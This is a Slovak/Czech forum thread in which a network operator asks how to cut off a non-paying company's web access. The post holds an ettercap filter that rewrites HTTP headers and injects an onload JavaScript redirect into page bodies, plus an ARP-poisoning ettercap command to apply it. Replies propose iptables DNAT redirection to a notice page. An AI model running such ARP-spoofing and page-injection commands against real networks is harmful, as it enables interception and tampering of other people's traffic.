Přidat otázku mezi oblíbenéZasílat nové odpovědi e-mailemVyřešeno Bic na neplaticov --- ettercap filter

Potrebujem spravit redirect http traficu u jednej neplatiacej firmy. Nastastie pre mna im ide cely trafic cez linux router, takze som sa rozhodol v prvom kole im znefunkcnit prehliace redirectom celeho http traficu.

if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
msg("changed Accept-Encoding!\n");
}
if (ip.proto == TCP && tcp.src == 80) {
replace("<BODY", "&#x000D<BODY onload=\"javascript:document.location.href='ip routra'\"><XSS a=");
replace("<body", "&#x000D<body onload=\"javascript:document.location.href='ip routra'\"><XSS a=");
msg("Filter Ran.\n");
}

Nakolko som rodeny antikoder a s ettercapom som sa hral naposledy pred 9-10 rokmi asi nie som si isty spravnostou filtra a jeho naslednym pouzitim.

Este doplnim, vytvoreny filter som "skompiloval" do tvaru zrozumitelneho ettercapu a spustil samotny ettercap.

ettercap -T -Q -M arp:remote // // -F /etc/filter.ef

Vcera som sa zastavil vecer na #linux-sk a tam sa ma tiez pytali, ze preco to riesim tak zlozito.
Paradoxom je, ze na svojej sieti mam neplaticov riesenych prave cez iptables, takze nechapem preco som sa trapil s ettercapom.
Vlastne asi viem, povodne som si myslel, ze linux je na sieti len ako pc so sambou az neskor som zistil, ze je to vlastne router a za nim je uz len to dslko, takze iptables boli ta spravna volba. V kazdom pripade toto je univerzalnejsie riesenie aj pre siet, kde nedisponujeme routrom, ale napr len masinou so sambou bez moznosti routovania.
9:03 z firmy sa nikto neozval, prisla len sms z neznameho cisla so smajlikom, takze doteraz neviem ci to funguje, v kazdom pripade im net nejde, pretoze ettercap vypina automaticky ip_forwarding (neviem sice preco).

vždyť to máš napsané nahoře..

máš 2 varianty:

- lokální "you-got-banned" web server: -j REDIRECT na všechna spojení směrem do netu na port 80 a 443
- ne-lokální (tj. někde u sebe) "you-got-banned" webserver: - DNAT na všechna spojení do netu na port 80 a 443

Je to prosté, ale účinné, pokud se navíc zakážou i ostatní porty, aby nešlo použít vnějších proxy, je to na 100% účinné.

/usr/sbin/iptables -I PREROUTING -t nat -p tcp -s 10.100.0.2 --dport 80 -j DNAT --to 10.100.0.1:999

Neplatic 10.100.0.2 ktory chce ist na net musi preroutovat cez router a ten, ked zisti, ze sa chysta napojit niekam na port 80 presmeruje ho na router(10.100.0.1) port 999. Na porte 999 pocuva superdemon a ten spusta takyto skript 999 stream tcp nowait nobody /bin/echo /bin/echo Nezaplatili ste za pouzivanie sluzieb. Volajte.

V pripade, ze mas niekde umiestneny web server mozes pouzit presmerovanie nan, takze namiesto portu 999 pouzijes 80. Ja uz mam webserver obsadeny, takze som vyuzil sluzieb superdemona.